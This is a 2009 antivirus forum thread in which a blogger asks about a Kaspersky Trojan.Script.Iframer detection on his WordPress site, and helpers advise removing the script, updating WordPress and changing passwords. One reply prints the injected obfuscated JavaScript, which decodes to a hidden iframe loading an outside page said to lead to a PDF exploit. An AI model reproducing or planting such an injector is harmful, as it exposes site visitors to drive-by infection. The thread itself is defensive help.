Help - Search - Members
Full Version: HEUR:Trojan.Script.Iframer
Kaspersky Lab Forum > English User Forum > Virus-related issues
Steven Wagenheim
10.02.2009 19:28
Need help.

Just got the following message from my own Blog from Kaspersky.

The requested URL could not be retrieved

While trying to retrieve the URL:

~~ snip

The following error was encountered:

The requested object is INFECTED with the following viruses: HEUR:Trojan.Script.Iframer


Please contact your service provider if you consider it incorrect.

Please tell me if this is a false positive and if not, how do I clear this up?
Lucian Bara
10.02.2009 19:36
hello
it's not a false positive, there's an obfuscated script on that page (i broke a few lines on the script):
CODE
fun   cti    on Decode(){var temp="",i,c=0,out=""; var str="60!105!     102!114!97!109!101!32          !115!114!99!61!34!104!116!116!112!58!47!47!102!105!108!97!114!109!111!110!46!105!110!102!111!47!100!111!99!115!47!105!110!102!111!46!104!116!109!108!34!32!115!116!121!108!101!61!34!112!111         !115!105!116!105!111!110!58!97!98!115!111!108!117!116!101!59!32!116!111!112!58!48!59!32!108!101!102!116!58!48!59!119!105!100!116!104!58!49!112!120!59!32!104!101!105!103!104!116!58!49!112!120!59!32!118!105!115!105!98!105!108!105!116!121!58!104!105!100!100!101!110!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);}Decode();

that scripts leads to a PDF exploit. to clear it up you need to search through the code and remove the script, also update wordpress it it's the case, and change administrative passwords
Steven Wagenheim
10.02.2009 19:42
Can you tell me which file this is located in? I don't even know where to begin to look for this.
Baz^^
10.02.2009 19:48
I think wordpress forum would probably be the best place to ask. I'm not an expert in that blogging software so the best place to ask is there. I can see the code right at the top of the blog page source but I am not sure where wordpress itself would store it (index.html maybe?)

Make sure you update to the latest wordpress ASAP to stop it happening again. As far as I can tell you are running a version previous to 2.7 which is the current up to date and secure relase.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.